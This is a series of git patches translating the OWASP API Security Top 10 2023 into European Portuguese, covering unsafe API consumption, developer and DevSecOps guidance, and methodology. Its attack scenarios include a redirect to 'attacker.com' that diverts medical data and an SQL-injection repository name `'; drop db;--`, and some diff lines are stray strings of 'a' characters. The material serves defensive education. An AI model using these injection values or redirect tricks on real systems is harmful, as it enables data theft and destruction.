all exposed versions of your APIs, not just for the current production - version. -* Avoid using production data with non-production API deployments. If this is - unavoidable, these endpoints should get the same security treatment as the - production ones. -* When newer versions of APIs include security improvements, perform a risk - analysis to inform the mitigation actions required for the older versions. - For example, whether it is possible to backport the improvements without - breaking API compatibility or if you need to take the older version out - quickly and force all clients to move to the latest version. - +* Inventarie todos os _hosts_ da API e documentar os aspectos + importantes de cada um deles, focando no ambiente da API (por exemplo, + produção, _staging_, teste, desenvolvimento), quem deve ter acesso à rede do + _host_ (por exemplo, público, interno, parceiros) e a versão da API. +* Inventarie os serviços integrados e documentar aspectos + importantes, como o seu papel no sistema, quais dados são trocados (fluxo de + dados) e a sua sensibilidade. +* Documente todos os aspectos da sua API, como autenticação, erros, + redirecionamentos, limitação de frequência de pedidos, política de partilha de + recursos entre origens (CORS) e _endpoints_, incluindo os seus parâmetros, + pedidos e respostas. +* Crie documentação automaticamente adotando padrões abertos. Inclua a + construção da documentação no seu _pipeline_ de CI/CD. +* Disponibilize a documentação da API apenas para aqueles autorizados a utilizar + a API. +* Utilize medidas de proteção externas, como soluções específicas de segurança + de API, para todas as versões expostas das suas APIs, não apenas para a versão + de produção atual. +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +* Evite utilizar dados de produção em implementações de API que não são + produção. Se isso for inevitável, esses _endpoints_ devem receber o mesmo + tratamento de segurança que os de produção. +* Quando versões mais recentes das APIs incluem melhorias de segurança, realize + uma análise de risco para informar as ações de mitigação necessárias para as + versões mais antigas. Por exemplo, se é possível aplicar as melhorias nessas + versões mais antigas sem quebrar a compatibilidade da API ou se é necessário + remover rapidamente a versão mais antiga e forçar todos os clientes a migrar + para a versão mais recente. ## Referências From 0bf8741ef462e8067bf51d47a04f1b365926fabf Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 19:48:18 +0000 Subject: [PATCH 51/64] Update 0xaa-unsafe-consumption-of-apis.md --- editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md index 016b1ddba..f9bd78eff 100644 --- a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md +++ b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md @@ -1,11 +1,11 @@ # API10:2023 Unsafe Consumption of APIs -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Average** | Technical **Severe** : Business Specific | +| Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Moderado** | Técnico **Severo** : Específico Negócio | | Exploiting this issue requires attackers to identify and potentially compromise other APIs/services the target API integrated with. Usually, this information is not publicly available or the integrated API/service is not easily exploitable. | Developers tend to trust and not verify the endpoints that interact with external or third-party APIs, relying on weaker security requirements such as those regarding transport security, authentication/authorization, and input validation and sanitization. Attackers need to identify services the target API integrates with (data sources) and, eventually, compromise them. | The impact varies according to what the target API does with pulled data. Successful exploitation may lead to sensitive information exposure to unauthorized actors, many kinds of injections, or denial of service. | -## Is the API Vulnerable? +## A API é vulnerável? Developers tend to trust data received from third-party APIs more than user input. This is especially true for APIs offered by well-known companies. From 7c80945cc91e45e59a3df53e6814d4a4adaaf2c4 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 22:48:25 +0000 Subject: [PATCH 52/64] Update 0xaa-unsafe-consumption-of-apis.md --- .../pt-pt/0xaa-unsafe-consumption-of-apis.md | 43 ++++++++++--------- 1 file changed, 22 insertions(+), 21 deletions(-) diff --git a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md index f9bd78eff..a5985fa2b 100644 --- a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md +++ b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md @@ -3,29 +3,30 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Moderado** | Técnico **Severo** : Específico Negócio | -| Exploiting this issue requires attackers to identify and potentially compromise other APIs/services the target API integrated with. Usually, this information is not publicly available or the integrated API/service is not easily exploitable. | Developers tend to trust and not verify the endpoints that interact with external or third-party APIs, relying on weaker security requirements such as those regarding transport security, authentication/authorization, and input validation and sanitization. Attackers need to identify services the target API integrates with (data sources) and, eventually, compromise them. | The impact varies according to what the target API does with pulled data. Successful exploitation may lead to sensitive information exposure to unauthorized actors, many kinds of injections, or denial of service. | +| Explorar este problema requer que os atacantes identifiquem e potencialmente comprometam outras APIs/serviços com os quais a API alvo está integrada. Normalmente, esta informação não está disponível publicamente ou a API/serviço integrado não é facilmente explorável. | Os desenvolvedores tendem a confiar e não a verificar os _endpoints_ que interagem com APIs externas ou de terceiros, dependendo de requisitos de segurança mais fracos, como aqueles relacionados à segurança do transporte, autenticação/autorização e validação e sanitização de dados. Os atacantes precisam identificar os serviços com os quais a API alvo se integra (fontes de dados) e, eventualmente, comprometer esses serviços. | O impacto varia de acordo com o que a API alvo faz com os dados extraídos. A exploração bem sucedida pode levar à exposição de informações sensíveis a atores não autorizados, a vários tipos de injeções ou à negação de serviço. | ## A API é vulnerável? -Developers tend to trust data received from third-party APIs more than user -input. This is especially true for APIs offered by well-known companies. -Because of that, developers tend to adopt weaker security standards, for -instance, in regards to input validation and sanitization. +Os desenvolvedores tendem a confiar mais nos dados recebidos de APIs de +terceiros do que nos dados fornecidos por utilizadores. Isso é especialmente +verdade para APIs oferecidas por empresas bem conhecidas. Por essa razão, os +desenvolvedores tendem a adotar padrões de segurança mais fracos, especialmente +no que diz respeito à validação e sanitização de dados. -The API might be vulnerable if: +A API pode estar vulnerável se: -* Interacts with other APIs over an unencrypted channel; -* Does not properly validate and sanitize data gathered from other APIs prior - to processing it or passing it to downstream components; -* Blindly follows redirections; -* Does not limit the number of resources available to process third-party - services responses; -* Does not implement timeouts for interactions with third-party services; +* Interage com outras APIs através de um canal não encriptado; +* Não valida e sanitiza corretamente os dados recolhidos de outras APIs antes de + os processar ou de os passar para componentes posteriores; +* Segue redirecionamentos cegamente; +* Não limita o número de recursos disponíveis para processar respostas de + serviços de terceiros; +* Não implementa limites de tempo para interações com serviços de terceiros; -## Example Attack Scenarios - -### Scenario #1 +## Exemplos de Cenários de Ataque +### Cenário #1 +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa An API relies on a third-party service to enrich user provided business addresses. When an address is supplied to the API by the end user, it is sent to the third-party service and the returned data is then stored on a local @@ -37,7 +38,7 @@ specific input that makes it pull their "malicious business" from the third-party service. The SQLi payload ends up being executed by the database, exfiltrating data to an attacker's controlled server. -### Scenario #2 +### Cenário #2 An API integrates with a third-party service provider to safely store sensitive user medical information. Data is sent over a secure connection using an HTTP @@ -62,7 +63,7 @@ Since the API blindly follows the third-party redirects, it will repeat the exact same request including the user's sensitive data, but this time to the attacker's server. -### Scenario #3 +### Cenário #3 An attacker can prepare a git repository named `'; drop db;--`. @@ -70,7 +71,7 @@ Now, when an integration from an attacked application is done with the malicious repository, SQL injection payload is used on an application that builds an SQL query believing the repository's name is safe input. -## How To Prevent +## Como Prevenir * When evaluating service providers, assess their API security posture. * Ensure all API interactions happen over a secure communication channel (TLS). @@ -80,7 +81,7 @@ builds an SQL query believing the repository's name is safe input. yours to: do not blindly follow redirects. -## References +## Referências ### OWASP @@ -91,7 +92,7 @@ builds an SQL query believing the repository's name is safe input. * [Transport Layer Protection Cheat Sheet][5] * [Unvalidated Redirects and Forwards Cheat Sheet][6] -### External +### Externas * [CWE-20: Improper Input Validation][7] * [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor][8] From 1e2674b1a7a4712438016e1480b4b3f5d766a386 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 23:13:38 +0000 Subject: [PATCH 53/64] Update 0xaa-unsafe-consumption-of-apis.md --- .../pt-pt/0xaa-unsafe-consumption-of-apis.md | 47 ++++++++++--------- 1 file changed, 24 insertions(+), 23 deletions(-) diff --git a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md index a5985fa2b..13f8934b5 100644 --- a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md +++ b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md @@ -26,23 +26,24 @@ A API pode estar vulnerável se: ## Exemplos de Cenários de Ataque ### Cenário #1 -aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -An API relies on a third-party service to enrich user provided business -addresses. When an address is supplied to the API by the end user, it is sent -to the third-party service and the returned data is then stored on a local -SQL-enabled database. -Bad actors use the third-party service to store an SQLi payload associated with -a business created by them. Then they go after the vulnerable API providing -specific input that makes it pull their "malicious business" from the -third-party service. The SQLi payload ends up being executed by the database, -exfiltrating data to an attacker's controlled server. +Uma API depende de um serviço de terceiros para enriquecer os endereços +comerciais fornecidos pelos utilizadores. Quando um endereço é fornecido pelo +utilizador final à API, ele é enviado para o serviço de terceiros e os dados +retornados são então armazenados numa base de dados local compatível com SQL. + +Atacantes utilizam o serviço de terceiros para armazenar um conteúdo malicioso +de injeção SQL (SQLi) associado a um negócio criado por eles. Em seguida, visam +a API vulnerável fornecendo um conteúdo específico que faz com que esta obtenha +o "negócio malicioso" do serviço de terceiros. O conteúdo de SQLi acaba por ser +executado pela base de dados, exfiltrando dados para um servidor controlado pelo +atacante. ### Cenário #2 -An API integrates with a third-party service provider to safely store sensitive -user medical information. Data is sent over a secure connection using an HTTP -request like the one below: +Uma API integra-se com um fornecedor de serviços de terceiros para armazenar com +segurança informações médicas sensíveis dos utilizadores. Os dados são enviados +através de uma conexão segura usando um pedido HTTP como o abaixo: ``` POST /user/store_phr_record @@ -51,28 +52,28 @@ POST /user/store_phr_record } ``` -Bad actors found a way to compromise the third-party API and it starts -responding with a `308 Permanent Redirect` to requests like the previous one. +Atacantes encontraram uma forma de comprometer a API de terceiros, que começa a +responder com um `308 Permanent Redirect` a pedidos como o anterior. ``` HTTP/1.1 308 Permanent Redirect Location: https://attacker.com/ ``` -Since the API blindly follows the third-party redirects, it will repeat the -exact same request including the user's sensitive data, but this time to the -attacker's server. +Como a API segue cegamente os redirecionamentos do terceiro, ela repetirá +exatamente o mesmo pedido, incluindo os dados sensíveis do utilizador, mas desta +vez para o servidor do atacante. ### Cenário #3 -An attacker can prepare a git repository named `'; drop db;--`. +Um atacante pode preparar um repositório git chamado `'; drop db;--`. -Now, when an integration from an attacked application is done with the -malicious repository, SQL injection payload is used on an application that -builds an SQL query believing the repository's name is safe input. +Agora, quando uma integração de uma aplicação atacada é feita com o repositório +malicioso, uma carga de injeção SQL é utilizada numa aplicação que constrói uma +consulta SQL, acreditando que o nome do repositório é um conteúdo seguro. ## Como Prevenir - +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa * When evaluating service providers, assess their API security posture. * Ensure all API interactions happen over a secure communication channel (TLS). * Always validate and properly sanitize data received from integrated APIs From 9cf22f855c2da9dfd33e8ff3c0d6f2554f364fa1 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sat, 2 Nov 2024 22:16:03 +0000 Subject: [PATCH 54/64] Update 0xaa-unsafe-consumption-of-apis.md --- .../2023/pt-pt/0xaa-unsafe-consumption-of-apis.md | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md index 13f8934b5..3081d4048 100644 --- a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md +++ b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md @@ -73,14 +73,15 @@ malicioso, uma carga de injeção SQL é utilizada numa aplicação que constró consulta SQL, acreditando que o nome do repositório é um conteúdo seguro. ## Como Prevenir -aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -* When evaluating service providers, assess their API security posture. -* Ensure all API interactions happen over a secure communication channel (TLS). -* Always validate and properly sanitize data received from integrated APIs - before using it. -* Maintain an allowlist of well-known locations integrated APIs may redirect - yours to: do not blindly follow redirects. +* Ao avaliar fornecedores de serviços, analise a postura de segurança das suas + APIs. +* Garanta que todas as interações com APIs ocorram através de um canal de + comunicação seguro (TLS). +* Valide e sanitize sempre os dados recebidos de APIs integradas antes de os + utilizar. +* Mantenha uma lista de permissões de locais conhecidos para os quais as APIs + integradas podem redirecionar a sua: não siga redirecionamentos cegamente. ## Referências From 7915cce8651fd3c377738c84fb64f8a5e1437335 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 05:55:08 +0000 Subject: [PATCH 55/64] Update 0xb0-next-devs.md --- editions/2023/pt-pt/0xb0-next-devs.md | 30 +++++++++++++-------------- 1 file changed, 15 insertions(+), 15 deletions(-) diff --git a/editions/2023/pt-pt/0xb0-next-devs.md b/editions/2023/pt-pt/0xb0-next-devs.md index 89139c49f..2de735d76 100644 --- a/editions/2023/pt-pt/0xb0-next-devs.md +++ b/editions/2023/pt-pt/0xb0-next-devs.md @@ -1,24 +1,24 @@ -# What's Next For Developers +# O Que Se Segue Para Programadores -The task to create and maintain secure applications, or fixing existing -applications, can be difficult. It is no different for APIs. +A tarefa de criar e manter aplicações seguras, ou corrigir aplicações +existentes, pode ser difícil. Não é diferente para as APIs. -We believe that education and awareness are key factors to writing secure -software. Everything else required to accomplish the goal depends on -**establishing and using repeatable security processes and standard security -controls**. +Acreditamos que educação e consciencialização são fatores chave para o +desenvolvimento de software seguro. Tudo o mais necessário para alcançar este +objetivo depende da **definição e utilização de processos de segurança +reprodutíveis e do uso de controlos de segurança _standard_**. -OWASP provides numerous free and open resources to help you address security. -Please visit the [OWASP Projects page][1] for a comprehensive list of available -projects. +A OWASP disponibiliza uma grande quantidade de recursos gratuitos e abertos para +abordar a segurança. Por favor visite a [página dos projetos OWASP][1] para +consulta da lista dos projetos existentes. | | | |-|-| -| **Education** | The [Application Security Wayfinder][2] should give you a good idea about what projects are available for each stage/phase of the Software Development LifeCycle (SDLC). For hands-on learning/training you can start with [OWASP **crAPI** - **C**ompletely **R**idiculous **API**][3] or [OWASP Juice Shop][4]: both have intentionally vulnerable APIs. The [OWASP Vulnerable Web Applications Directory Project][5] provides a curated list of intentionally vulnerable applications: you'll find there several other vulnerable APIs. You can also attend [OWASP AppSec Conference][6] training sessions, or [join your local chapter][7]. | -| **Security Requirements** | Security should be part of every project from the beginning. When defining requirements, it is important to define what "secure" means for that project. OWASP recommends you use the [OWASP Application Security Verification Standard (ASVS)][8] as a guide for setting the security requirements. If you're outsourcing, consider the [OWASP Secure Software Contract Annex][9], which should be adapted according to local law and regulations. | -| **Security Architecture** | Security should remain a concern during all the project stages. The [OWASP Cheat Sheet Series][10] is a good starting point for guidance on how to design security in during the architecture phase. Among many others, you'll find the [REST Security Cheat Sheet][11] and the [REST Assessment Cheat Sheet][12] as well the [GraphQL Cheat Sheet][13]. | -| **Standard Security Controls** | Adopting standard security controls reduces the risk of introducing security weaknesses while writing your own logic. Although many modern frameworks now come with effective built-in standard controls, [OWASP Proactive Controls][14] gives you a good overview of what security controls you should look to include in your project. OWASP also provides some libraries and tools you may find valuable, such as validation controls. | -| **Secure Software Development Life Cycle** | You can use the [OWASP Software Assurance Maturity Model (SAMM)][15] to improve your processes of building APIs. Several other OWASP projects are available to help you during the different API development phases e.g., the [OWASP Code Review Guide][16]. | +| **Educação** | The [Application Security Wayfinder][2] should give you a good idea about what projects are available for each stage/phase of the Software Development LifeCycle (SDLC). For hands-on learning/training you can start with [OWASP **crAPI** - **C**ompletely **R**idiculous **API**][3] or [OWASP Juice Shop][4]: both have intentionally vulnerable APIs. The [OWASP Vulnerable Web Applications Directory Project][5] provides a curated list of intentionally vulnerable applications: you'll find there several other vulnerable APIs. You can also attend [OWASP AppSec Conference][6] training sessions, or [join your local chapter][7]. | +| **Requisitos de Segurança** | Security should be part of every project from the beginning. When defining requirements, it is important to define what "secure" means for that project. OWASP recommends you use the [OWASP Application Security Verification Standard (ASVS)][8] as a guide for setting the security requirements. If you're outsourcing, consider the [OWASP Secure Software Contract Annex][9], which should be adapted according to local law and regulations. | +| **Arquitetura de Segurança** | Security should remain a concern during all the project stages. The [OWASP Cheat Sheet Series][10] is a good starting point for guidance on how to design security in during the architecture phase. Among many others, you'll find the [REST Security Cheat Sheet][11] and the [REST Assessment Cheat Sheet][12] as well the [GraphQL Cheat Sheet][13]. | +| **Controlos Standard de Segurança** | Adopting standard security controls reduces the risk of introducing security weaknesses while writing your own logic. Although many modern frameworks now come with effective built-in standard controls, [OWASP Proactive Controls][14] gives you a good overview of what security controls you should look to include in your project. OWASP also provides some libraries and tools you may find valuable, such as validation controls. | +| **Ciclo de Desenvolvimento de Software Seguro** | You can use the [OWASP Software Assurance Maturity Model (SAMM)][15] to improve your processes of building APIs. Several other OWASP projects are available to help you during the different API development phases e.g., the [OWASP Code Review Guide][16]. | [1]: https://owasp.org/projects/ [2]: https://owasp.org/projects/#owasp-projects-the-sdlc-and-the-security-wayfinder From 000683323be50e7155ea85a25c7e83de0689f5e1 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 07:58:53 +0000 Subject: [PATCH 56/64] Update 0xb0-next-devs.md --- editions/2023/pt-pt/0xb0-next-devs.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/editions/2023/pt-pt/0xb0-next-devs.md b/editions/2023/pt-pt/0xb0-next-devs.md index 2de735d76..76c38f98c 100644 --- a/editions/2023/pt-pt/0xb0-next-devs.md +++ b/editions/2023/pt-pt/0xb0-next-devs.md @@ -14,11 +14,11 @@ consulta da lista dos projetos existentes. | | | |-|-| -| **Educação** | The [Application Security Wayfinder][2] should give you a good idea about what projects are available for each stage/phase of the Software Development LifeCycle (SDLC). For hands-on learning/training you can start with [OWASP **crAPI** - **C**ompletely **R**idiculous **API**][3] or [OWASP Juice Shop][4]: both have intentionally vulnerable APIs. The [OWASP Vulnerable Web Applications Directory Project][5] provides a curated list of intentionally vulnerable applications: you'll find there several other vulnerable APIs. You can also attend [OWASP AppSec Conference][6] training sessions, or [join your local chapter][7]. | -| **Requisitos de Segurança** | Security should be part of every project from the beginning. When defining requirements, it is important to define what "secure" means for that project. OWASP recommends you use the [OWASP Application Security Verification Standard (ASVS)][8] as a guide for setting the security requirements. If you're outsourcing, consider the [OWASP Secure Software Contract Annex][9], which should be adapted according to local law and regulations. | -| **Arquitetura de Segurança** | Security should remain a concern during all the project stages. The [OWASP Cheat Sheet Series][10] is a good starting point for guidance on how to design security in during the architecture phase. Among many others, you'll find the [REST Security Cheat Sheet][11] and the [REST Assessment Cheat Sheet][12] as well the [GraphQL Cheat Sheet][13]. | -| **Controlos Standard de Segurança** | Adopting standard security controls reduces the risk of introducing security weaknesses while writing your own logic. Although many modern frameworks now come with effective built-in standard controls, [OWASP Proactive Controls][14] gives you a good overview of what security controls you should look to include in your project. OWASP also provides some libraries and tools you may find valuable, such as validation controls. | -| **Ciclo de Desenvolvimento de Software Seguro** | You can use the [OWASP Software Assurance Maturity Model (SAMM)][15] to improve your processes of building APIs. Several other OWASP projects are available to help you during the different API development phases e.g., the [OWASP Code Review Guide][16]. | +| **Educação** | O [Application Security Wayfinder][2] deve oferecer uma boa ideia sobre quais projetos estão disponíveis para cada etapa/fase do Ciclo de Vida do Desenvolvimento de Software (SDLC). Para aprendizagem prática/treino, pode começar com [OWASP **crAPI** - **C**ompletely **R**idiculous **API**][3] ou [OWASP Juice Shop][4]: ambos possuem APIs intencionalmente vulneráveis. O [OWASP Vulnerable Web Applications Directory Project][5] fornece uma lista curada de aplicações intencionalmente vulneráveis: lá encontrará várias outras APIs vulneráveis. Também pode participar em sessões de treino da [OWASP AppSec Conference][6] ou [juntar-se ao seu chapter local][7]. | +| **Requisitos de Segurança** | A segurança deve fazer parte de qualquer projeto desde o início. É importante que, durante a fase de identificação de requisitos, seja definido o que é que “seguro” significa no contexto desse projeto. A OWASP recomenda a utilização do [OWASP Application Security Verification Standard (ASVS)][8] como guia para definir os requisitos de segurança. Se estiver a subcontratar, considere ao invés a utilização do [OWASP Secure Software Contract Annex][9], o qual deverá adaptar às leis e regulamentações locais. | +| **Arquitetura de Segurança** | A segurança deve ser uma preocupação durante todas as fases dum projeto. O projeto [OWASP Prevention Cheat Sheets][10] é um bom ponto inicial de orientação sobre como contemplar a segurança durante a fase de arquitetura. Entre outros, o [REST Security Cheat Sheet][11] e o [REST Assessment Cheat Sheet][12] serão seguramente relevantes, como também o [GraphQL Cheat Sheet][13]. | +| **Controlos Standard de Segurança** | A adoção de controlos standard de segurança reduzem o risco de introdução de falhas de segurança durante a implementação da lógica de negócio. Apesar de muitas _frameworks_ modernas já incluírem controlos standard, o projeto [OWASP Proactive Controls][14] dá-lhe uma boa visão sobre que controlos de segurança deve incluir no seu projeto. A OWASP também disponibiliza algumas bibliotecas e ferramentas que pode achar úteis, tais como controlos de validação. | +| **Ciclo de Desenvolvimento de Software Seguro** | Pode usar o [OWASP Software Assurance Maturity Model (SAMM)][15] para melhorar o processo de desenvolvimento de APIs. Tem ainda disponíveis vários outros projetos OWASP para o ajudar durante as várias fases de desenvolvimento de APIs, por exemplo o [OWASP Code Review Guide][16]. | [1]: https://owasp.org/projects/ [2]: https://owasp.org/projects/#owasp-projects-the-sdlc-and-the-security-wayfinder From 1c738f2a483241d40e0476fce7c2586172e83e75 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 08:24:45 +0000 Subject: [PATCH 57/64] Update 0xb1-next-devsecops.md --- editions/2023/pt-pt/0xb1-next-devsecops.md | 31 +++++++++++----------- 1 file changed, 16 insertions(+), 15 deletions(-) diff --git a/editions/2023/pt-pt/0xb1-next-devsecops.md b/editions/2023/pt-pt/0xb1-next-devsecops.md index 7cf75e87d..750715bed 100644 --- a/editions/2023/pt-pt/0xb1-next-devsecops.md +++ b/editions/2023/pt-pt/0xb1-next-devsecops.md @@ -1,24 +1,25 @@ -# What's Next For DevSecOps +# O que Se Segue Para DevSecOps -Due to their importance in modern application architectures, building secure -APIs is crucial. Security cannot be neglected, and it should be part of the -whole development life cycle. Scanning and penetration testing yearly are no -longer enough. +Dada a sua importância na arquitetura das aplicações modernas, desenvolver APIs +seguras é crucial. A segurança não pode ser negligenciada e deve estar presente +durante todo o clico de vida do desenvolvimento. Já não basta a execução de +_scanners_ ou a realização de testes de penetração anualmente. -DevSecOps should join the development effort, facilitating continuous security -testing across the entire software development life cycle. Your goal should be -to enhance the development pipeline with security automation, but without -impacting the speed of development. +A equipa de DevSecOps deve fazer parte do esforço de desenvolvimento +contribuindo para a realização de testes de segurança, de forma continuada, +durante todo o ciclo de vida do desenvolvimento. Deve ter como objetivo melhorar +a _pipeline_ de desenvolvimento com automação de segurança e sem influenciar +negativamente o ritmo do desenvolvimento. -In case of doubt, stay informed, and refer to the [DevSecOps Manifesto][1]. +Em caso de dúvida mantenha-se informado e reveja o [Manifesto DevSecOps][1]. | | | |-|-| -| **Understand the Threat Model** | Testing priorities come from a threat model. If you don't have one, consider using [OWASP Application Security Verification Standard (ASVS)][2], and the [OWASP Testing Guide][3] as an input. Involving the development team will help to make them more security-aware. | -| **Understand the SDLC** | Join the development team to better understand the Software Development Life Cycle. Your contribution on continuous security testing should be compatible with people, processes, and tools. Everyone should agree with the process, so that there's no unnecessary friction or resistance. | -| **Testing Strategies** | Since your work should not impact the development speed, you should wisely choose the best (simple, fastest, most accurate) technique to verify the security requirements. The [OWASP Security Knowledge Framework][4] and [OWASP Application Security Verification Standard][2] can be great sources of functional and nonfunctional security requirements. There are other great sources for [projects][5] and [tools][6] similar to the one offered by the [DevSecOps community][7]. | -| **Achieving Coverage and Accuracy** | You're the bridge between developers and operations teams. To achieve coverage, not only should you focus on the functionality, but also the orchestration. Work close to both development and operations teams from the beginning so you can optimize your time and effort. You should aim for a state where the essential security is verified continuously. | -| **Clearly Communicate Findings** | Contribute value with less or no friction. Deliver findings in a timely fashion, within the tools development teams are using (not PDF files). Join the development team to address the findings. Take the opportunity to educate them, clearly describing the weakness and how it can be abused, including an attack scenario to make it real. | +| **Compreenda o Modelo de Ameaças** | As prioridades relativamente ao que deve ser testado têm origem no modelo de ameaças. Se não tem um, considere usar o [OWASP Application Security Verification Standard (ASVS)][2] e o [OWASP Testing Guide][3] como base. Envolver a equipa de desenvolvimento na elaboração do modelo de ameaças pode torná-la mais consciente para questões relacionadas com segurança. | +| **Compreenda o Ciclo de Vida do Desenvolvimento do Software** | Reúna a equipa de desenvolvimento para melhor compreender o ciclo de vida do desenvolvimento do software. O seu contributo para a realização continua de testes de segurança deve ser compatível com as pessoas, processos e ferramentas. Todos devem concordar com o processo, de forma a não provocar atrito ou resistência desnecessários. | +| **Estratégias de Teste** | Sendo que o seu trabalho não deve condicionar o ritmo de desenvolvimento, deverá escolher cuidadosamente a melhor (mais simples, rápida e precisa) técnica para verificar os requisitos de segurança. A [OWASP Security Knowledge Framework][4] e o [OWASP Application Security Verification Standard][2] podem ser importantes fontes de requisitos de segurança funcionais e não-funcionais. Existem outras fontes relevantes onde poderá encontrar [projetos][5] e [ferramentas][6] como aquelas disponibilizadas pela [comunidade DevSecOps][7]. | +| **Procure Alcançar Cobertura e Precisão** | Você é a ponte entre as equipas de desenvolvimento e operações. Para alcançar cobertura, deve não só focar-se na funcionalidade, mas também na orquestração. Trabalhe junto de ambas as equipas desde o início por forma a otimizar o seu tempo e esforço. Deve almejar um estado em que o essencial da segurança é verificado de forma continua. | +| **Comunique as Falhas de Forma Clara** | Entregue valor evitando qualquer atrito. Comunique as falhas identificadas atempadamente, usando as ferramentas que a equipa de desenvolvimento já utiliza (e não através de ficheiros PDF). Junte-se à equipa de desenvolvimento para resolver as falhas identificadas. Aproveite a oportunidade para educar os elementos da equipa de desenvolvimento, descrevendo de forma clara a falha e como esta pode ser abusada, incluindo um cenário de ataque para a tornar mais real. | [1]: https://www.devsecops.org/ [2]: https://owasp.org/www-project-application-security-verification-standard/ From 275be74f00eb6b0c76576f1b6de7a65ce98ca198 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 09:09:16 +0000 Subject: [PATCH 58/64] Update 0xd0-about-data.md --- editions/2023/pt-pt/0xd0-about-data.md | 132 +++++++++++++------------ 1 file changed, 67 insertions(+), 65 deletions(-) diff --git a/editions/2023/pt-pt/0xd0-about-data.md b/editions/2023/pt-pt/0xd0-about-data.md index 3e856f718..90919b3a8 100644 --- a/editions/2023/pt-pt/0xd0-about-data.md +++ b/editions/2023/pt-pt/0xd0-about-data.md @@ -1,68 +1,70 @@ -# Methodology and Data - -## Overview - -For this list update, the OWASP API Security team used the same methodology used -for the successful and well adopted 2019 list, with the addition of a 3 month -[public Call for Data][1]. Unfortunately, this call for data did not result in -data that would have enabled a relevant statistical analysis of the most common -API security issues. - -However, with a more mature API security industry capable of providing direct -feedback and insights, the update process moved forward using the same -methodology as before. - -Arrived here, we believe to have a good forward-looking awareness document for -the next three or four years, more focused on modern APIs-specific issues. The -goal of this project isn't to replace other top 10 lists, but instead to cover -the existing and upcoming top API security risks that we believe the industry -should be aware and diligent about. - -## Methodology - -In the first phase, publicly available data about API security incidents were -collected, reviewed, and categorized. Such data were collected from bug bounty -platforms and publicly available reports. Only issues reported between 2019 and -2022 were considered. This data was used to give the team a sense of in which -direction the previous top 10 list should evolve as well as to help deal with -possible contributed data bias. - -A public [Call for Data][1] ran from September 1st and November 30th, 2022. In -parallel the project team started the discussion about what has changed since -2019. The discussion included the impact of the first list, feedback received -from the community, and new trends of API security. - -The project team promoted meetings with specialists on relevant API security -threats to get insights into how victims are impacted and how those threats can -be mitigated. - -This effort resulted in an initial draft of what the team believes were the ten -most critical API security risks. The [OWASP Risk Rating Methodology][2] was -used to perform the risk analysis. Prevalence ratings were decided from a -consensus among the project team members, based on their experience in the -field. For considerations on these matters, please refer to the [API Security -Risks][3] section. - -The initial draft was then shared for review with security practitioners with -relevant experience in the API security fields. Their comments were reviewed, -discussed, and when applicable included in the document. The resulting document -was [published as a Release Candidate][4] for [open discussion][5]. Several -[community contributions][6] were included into the final document. - -The list of contributors is available in the [Acknowledgments][7] section. - -## API Specific Risks - -The list is built to address security risks that are more specific to APIs. - -It does not imply that other generic application security risks don't exist in -API based applications. For example, we didn't include risks such as "Vulnerable -and Outdated Components" or "Injection", even though you might find them in API -based applications. These risks are generic, they don't behave differently in -APIs, 